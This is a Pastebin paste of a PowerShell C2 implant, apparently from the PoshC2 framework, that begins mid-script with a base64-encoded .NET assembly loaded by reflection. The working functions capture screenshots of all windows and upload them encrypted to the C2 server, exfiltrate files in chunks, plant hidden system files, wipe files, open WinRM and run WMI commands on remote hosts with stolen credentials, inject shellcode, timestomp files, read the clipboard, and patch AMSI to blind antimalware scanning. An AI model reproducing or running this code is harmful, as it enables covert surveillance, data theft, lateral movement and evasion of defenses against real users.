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"
  387.         $dllbytes  = [System.Convert]::FromBase64String($ps)
  388.         $assembly = [System.Reflection.Assembly]::Load($dllbytes)
  389.     }
  390.  
  391.     $processes = Get-Process
  392.     foreach ($p in $processes)
  393.     {
  394.         try {
  395.             [IntPtr] $windowHandle = $p.MainWindowHandle;
  396.             $msimage = New-Object IO.MemoryStream
  397.             $bitmap = [WindowStation]::Capture($windowHandle);
  398.             $bitmap.save($msimage, "bmp")
  399.             $b64 = [Convert]::ToBase64String($msimage.toarray())
  400.             $bitmap.Dispose();
  401.             $ReadCommand = "get-screenshot"
  402.             $ReadCommand = Encrypt-String $key $ReadCommand
  403.             $send = Encrypt-String2 $key $b64
  404.             $UploadBytes = getimgdata $send
  405.             (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
  406.         } catch {}
  407.     }
  408.     $error.clear()
  409. }
  410. function Download-Files
  411. {
  412.     param
  413.     (
  414.         [string] $Directory
  415.     )
  416.     $files = Get-ChildItem $Directory -Recurse | Where-Object{!($_.PSIsContainer)}
  417.     foreach ($item in $files)
  418.     {
  419.         Download-File $item.FullName
  420.     }
  421. }
  422. function Get-RandomName
  423. {
  424.     param
  425.     (
  426.         [int]$Length
  427.     )
  428.     $set    = 'abcdefghijklmnopqrstuvwxyz0123456789'.ToCharArray()
  429.     $result = ''
  430.     for ($x = 0; $x -lt $Length; $x++)
  431.     {$result += $set | Get-Random}
  432.     return $result
  433. }
  434. function Download-File
  435. {
  436.     param
  437.     (
  438.         [string] $Source
  439.     )
  440.     try {
  441.         $fileName = Resolve-PathSafe $Source
  442.         $randomName = Get-RandomName -Length 5
  443.         $fileExt = [System.IO.Path]::GetExtension($fileName)
  444.         $fileNameOnly = [System.IO.Path]::GetFileNameWithoutExtension($fileName)
  445.         $fullNewname = $Source
  446.         $bufferSize = 10737418;
  447.  
  448.         $fs = [System.IO.File]::Open($fileName, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::ReadWrite);        
  449.         $fileSize =(Get-Item $fileName).Length
  450.        
  451.         $chunkSize = $fileSize / $bufferSize
  452.         $totalChunks = [int][Math]::Ceiling($chunkSize)
  453.         if ($totalChunks -lt 1) {$totalChunks = 1}
  454.         $totalChunkStr = $totalChunks.ToString("00000")
  455.         $totalChunkByte = [System.Text.Encoding]::UTF8.GetBytes($totalChunkStr)
  456.         $Chunk = 1
  457.         $finfo = new-object System.IO.FileInfo ($fileName)
  458.         $size = $finfo.Length
  459.         $str = New-Object System.IO.BinaryReader($fs);
  460.         do {
  461.             $ChunkStr = $Chunk.ToString("00000")
  462.             $ChunkedByte = [System.Text.Encoding]::UTF8.GetBytes($ChunkStr)
  463.             $preNumbers = New-Object byte[] 10
  464.             $preNumbers = ($ChunkedByte+$totalChunkByte)
  465.             $readSize = $bufferSize;
  466.             $chunkBytes = $str.ReadBytes($readSize);
  467.             $ReadCommand = "download-file "+$fullNewname
  468.             $ReadCommand = Encrypt-String $key $ReadCommand
  469.             $send = Encrypt-Bytes $key ($preNumbers+$chunkBytes)
  470.             $UploadBytes = getimgdata $send
  471.             (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
  472.             ++$Chunk
  473.         } until (($size -= $bufferSize) -le 0);
  474.     } catch {
  475.         $Output = "ErrorCmd: " + $error[0]
  476.         $ReadCommand = "Error downloading file "+$fullnewname
  477.         $ReadCommand = Encrypt-String $key $ReadCommand  
  478.         $send = Encrypt-String2 $key $output
  479.         $UploadBytes = getimgdata $send
  480.         (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
  481.     }
  482. }
  483. function Posh-Delete
  484. {
  485.     param
  486.     (
  487.         [string] $Destination
  488.     )
  489.     try {
  490.     $file = Get-Item $Destination -Force
  491.     $file.Attributes = "Normal"
  492.     $content = New-Object Byte[] $file.length
  493.     (New-Object Random).NextBytes($content)
  494.     [IO.File]::WriteAllBytes($file,$content)
  495.     Remove-Item $Destination -Force
  496.     } catch {
  497.     echo $error[0]
  498.     }
  499. }
  500. function Upload-File
  501. {
  502.     param
  503.     (
  504.         [string] $Base64,
  505.         [string] $Destination
  506.     )
  507.     try {
  508.     write-output "Uploaded file as HIDDEN & SYSTEM to: $Destination"
  509.     write-output "Run Get-ChildItem -Force to view the uploaded files"
  510.     $fileBytes = [Convert]::FromBase64String($Base64)
  511.     [io.file]::WriteAllBytes($Destination, $fileBytes)
  512.     $file = Get-Item $Destination -Force
  513.     $attrib = $file.Attributes
  514.     $attrib = "Hidden,System"
  515.     $file.Attributes = $attrib  
  516.     } catch {
  517.     echo $error[0]
  518.     }  
  519. }
  520. function Resolve-PathSafe
  521. {
  522.     param
  523.     (
  524.         [string] $Path
  525.     )
  526.      
  527.     $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($Path)
  528. }
  529. function EnableWinRM {
  530. Param
  531. (
  532. [string]
  533. $username,
  534. [string]
  535. $password,
  536. [string]
  537. $computer
  538. )
  539. Invoke-command -computer localhost -credential $getcreds -scriptblock { set-itemproperty -path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Value 1 -Type Dword}
  540. Invoke-Command -Computer localhost -Credential $getcreds -Scriptblock {Set-Item WSMan:localhost\client\trustedhosts -value * -force}
  541. $command = "cmd /c powershell.exe -c Set-WSManQuickConfig -Force;Set-Item WSMan:\localhost\Service\Auth\Basic -Value $True;Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $True; Register-PSSessionConfiguration -Name Microsoft.PowerShell -Force"
  542. $PSS = ConvertTo-SecureString $password -AsPlainText -Force
  543. $getcreds = new-object system.management.automation.PSCredential $username,$PSS
  544. Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $computer -Credential $getcreds -ArgumentList $command
  545. }
  546.  
  547. function DisableWinRM {
  548. Param
  549. (
  550. [string]
  551. $username,
  552. [string]
  553. $password,
  554. [string]
  555. $computer
  556. )
  557. $command = "cmd /c powershell.exe -c Set-Item WSMan:\localhost\Service\Auth\Basic -Value $False;Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value $False;winrm delete winrm/config/listener?address=*+transport=HTTP;Stop-Service -force winrm;Set-Service -Name winrm -StartupType Disabled"
  558. $PSS = ConvertTo-SecureString $password -AsPlainText -Force
  559. $getcreds = new-object system.management.automation.PSCredential $username,$PSS
  560. Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $computer -Credential $getcreds -ArgumentList $command
  561. }
  562. function WMICommand {
  563. Param
  564. (
  565. [string]
  566. $username,
  567. [string]
  568. $password,
  569. [string]
  570. $computer,
  571. [string]
  572. $command
  573. )
  574. $PSS = ConvertTo-SecureString $password -AsPlainText -Force
  575. $getcreds = new-object system.management.automation.PSCredential $username,$PSS
  576. $WMIResult = Invoke-WmiMethod -Path Win32_process -Name create -ComputerName $computer -Credential $getcreds -ArgumentList $command
  577. If ($WMIResult.Returnvalue -eq 0) {
  578.     Write-Output "Executed WMI Command with Sucess: $Command `n"
  579. } else {
  580.     Write-Output "WMI Command Failed - Could be due to permissions or UAC is enabled on the remote host, Try mounting the C$ share to check administrative access to the host"
  581. }
  582. }
  583.  
  584. Function Get-ProcessFull {
  585.  
  586. [System.Diagnostics.Process[]] $processes64bit = @()
  587. [System.Diagnostics.Process[]] $processes32bit = @()
  588.  
  589.  
  590. $owners = @{}
  591. gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
  592.  
  593. $AllProcesses = @()
  594.  
  595.     if (Test-Win64) {
  596.         Write-Output "64bit implant running on 64bit machine"
  597.     }
  598.  
  599. if (Test-Win64) {
  600.     foreach($process in get-process) {
  601.     $modules = $process.modules
  602.     foreach($module in $modules) {
  603.         $file = [System.IO.Path]::GetFileName($module.FileName).ToLower()
  604.         if($file -eq "wow64.dll") {
  605.             $processes32bit += $process
  606.             $pobject = New-Object PSObject | Select ID, StartTime, Name, Path, Arch, Username
  607.             $pobject.Id = $process.Id
  608.             $pobject.StartTime = $process.StartTime
  609.             $pobject.Name = $process.Name
  610.             $pobject.Path = $process.Path
  611.             $pobject.Arch = "x86"
  612.             $pobject.UserName = $owners[$process.Id.tostring()]
  613.             $AllProcesses += $pobject
  614.             break
  615.         }
  616.     }
  617.  
  618.     if(!($processes32bit -contains $process)) {
  619.         $processes64bit += $process
  620.         $pobject = New-Object PSObject | Select ID, StartTime, Name, Path, Arch, UserName
  621.         $pobject.Id = $process.Id
  622.         $pobject.StartTime = $process.StartTime
  623.         $pobject.Name = $process.Name
  624.         $pobject.Path = $process.Path
  625.         $pobject.Arch = "x64"
  626.         $pobject.UserName = $owners[$process.Id.tostring()]
  627.         $AllProcesses += $pobject
  628.     }
  629. }
  630. }
  631. elseif ((Test-Win32) -and (-Not (Test-Wow64))) {
  632. foreach($process in get-process) {
  633.     $processes32bit += $process
  634.     $pobject = New-Object PSObject | Select ID, StartTime, Name, Path, Arch, Username
  635.     $pobject.Id = $process.Id
  636.     $pobject.StartTime = $process.StartTime
  637.     $pobject.Name = $process.Name
  638.     $pobject.Path = $process.Path
  639.     $pobject.Arch = "x86"
  640.     $pobject.UserName = $owners[$process.Id.tostring()]
  641.     $AllProcesses += $pobject
  642. }
  643. }
  644. elseif ((Test-Win32) -and (Test-Wow64)) {
  645.     foreach($process in get-process) {
  646.     $modules = $process.modules
  647.     foreach($module in $modules) {
  648.         $file = [System.IO.Path]::GetFileName($module.FileName).ToLower()
  649.         if($file -eq "wow64.dll") {
  650.             $processes32bit += $process
  651.             $pobject = New-Object PSObject | Select ID, StartTime, Name, Path, Arch, Username
  652.             $pobject.Id = $process.Id
  653.             $pobject.StartTime = $process.StartTime
  654.             $pobject.Name = $process.Name
  655.             $pobject.Path = $process.Path
  656.             $pobject.Arch = "x86"
  657.             $pobject.UserName = $owners[$process.Id.tostring()]
  658.             $AllProcesses += $pobject
  659.             break
  660.         }
  661.     }
  662.  
  663.     if(!($processes32bit -contains $process)) {
  664.         $processes64bit += $process
  665.         $pobject = New-Object PSObject | Select ID, StartTime, Name, Path, Arch, UserName
  666.         $pobject.Id = $process.Id
  667.         $pobject.StartTime = $process.starttime
  668.         $pobject.Name = $process.Name
  669.         $pobject.Path = $process.Path
  670.         $pobject.Arch = "x64"
  671.         $pobject.UserName = $owners[$process.Id.tostring()]
  672.         $AllProcesses += $pobject
  673.     }
  674. }
  675. } else {
  676.     Write-Output "Unknown Architecture"
  677. }
  678.  
  679. $AllProcesses|Select ID, UserName, Arch, Name, Path, StartTime | format-table -auto
  680.  
  681. }
  682. Function Invoke-Netstat {                      
  683. try {            
  684.     $TCPProperties = [System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties()            
  685.     $Connections = $TCPProperties.GetActiveTcpListeners()            
  686.     foreach($Connection in $Connections) {            
  687.         if($Connection.address.AddressFamily -eq "InterNetwork" ) { $IPType = "IPv4" } else { $IPType = "IPv6" }
  688.         $OutputObj = New-Object -TypeName PSobject            
  689.         $OutputObj | Add-Member -MemberType NoteProperty -Name "LocalAddress" -Value $connection.Address            
  690.         $OutputObj | Add-Member -MemberType NoteProperty -Name "ListeningPort" -Value $Connection.Port            
  691.         $OutputObj | Add-Member -MemberType NoteProperty -Name "IPV4Or6" -Value $IPType            
  692.         $OutputObj            
  693.     }            
  694.            
  695. } catch {            
  696.     Write-Error "Failed to get listening connections. $_"            
  697. }          
  698. }
  699. Function Get-Webpage {
  700.     param ($url)
  701.     $file = (New-Object System.Net.Webclient).DownloadString($url)|Out-String
  702.     $ReadCommand = "download-file web.html"
  703.     $ReadCommand = Encrypt-String $key $ReadCommand
  704.     $bytes = [System.Text.Encoding]::UTF8.GetBytes($file)
  705.     $base64 = [Convert]::ToBase64String($bytes)  
  706.     $Output = Encrypt-String2 $key $base64
  707.     $UploadBytes = getimgdata $Output
  708.     (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
  709. }
  710. Function AutoMigrate {
  711. if (($p = Get-Process | ? {$_.id -eq $pid}).name -eq "powershell") {
  712.     $t=$true
  713. }
  714. if ($t -and [IntPtr]::size -eq 8){
  715.    Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode64))
  716. }
  717. elseif (($t -and [IntPtr]::size -eq 4)) {
  718.     Inject-Shellcode -x86 -Shellcode ([System.Convert]::FromBase64String($Shellcode86))
  719. }
  720. }
  721. Function AutoMigrate-Always {
  722. if ([IntPtr]::size -eq 8){
  723.    Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode64))
  724. }
  725. elseif ([IntPtr]::size -eq 4) {
  726.     Inject-Shellcode -x86 -Shellcode ([System.Convert]::FromBase64String($Shellcode86))
  727. }
  728. }
  729. Function TimeStomp($File, $Date) {
  730.     $file=(gi $file)
  731.     $file.LastWriteTime=$date;
  732.     $file.LastAccessTime=$date;
  733.     $file.CreationTime=$date;
  734. }
  735. Function Get-Clipboard {
  736.     add-type -a system.windows.forms
  737.     [windows.forms.clipboard]::GetText()
  738. }
  739. Function Get-AllServices {
  740.     $Keys = Get-ChildItem HKLM:\System\CurrentControlSet\services; $Items = $Keys | Foreach-Object {Get-ItemProperty $_.PsPath }
  741.     ForEach ($Item in $Items) {$n=$Item.PSChildName;$i=$Item.ImagePath;$d=$Item.Description; echo "Name: $n `nImagePath: $i `nDescription: $d`n"}
  742. }
  743. Function Get-AllFirewallRules($path) {
  744.     $Rules=(New-object -comObject HNetCfg.FwPolicy2).rules
  745.     if ($path) {
  746.         $Rules | export-csv $path -NoTypeInformation
  747.     } else {
  748.         $Rules
  749.     }
  750. }
  751. Function Unhook-AMSI {
  752.    
  753.     $win32 = @"
  754. using System.Runtime.InteropServices;
  755. using System;
  756. public class Win32 {
  757. [DllImport("kernel32")]
  758. public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
  759. [DllImport("kernel32")]
  760. public static extern IntPtr LoadLibrary(string name);
  761. [DllImport("kernel32")]
  762. public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect
  763. );
  764. }
  765. "@
  766. Add-Type $win32
  767. $ptr = [Win32]::GetProcAddress([Win32]::LoadLibrary("amsi.dll"), "AmsiScanBuffer")
  768. $b = 0
  769. [Win32]::VirtualProtect($ptr, [UInt32]5, 0x40, [Ref]$b)
  770. $buf = New-Object Byte[] 7
  771. $buf[0] = 0x66; $buf[1] = 0xb8; $buf[2] = 0x01; $buf[3] = 0x00; $buf[4] = 0xc2; $buf[5] = 0x18; $buf[6] = 0x00;
  772. [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 7)
  773. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!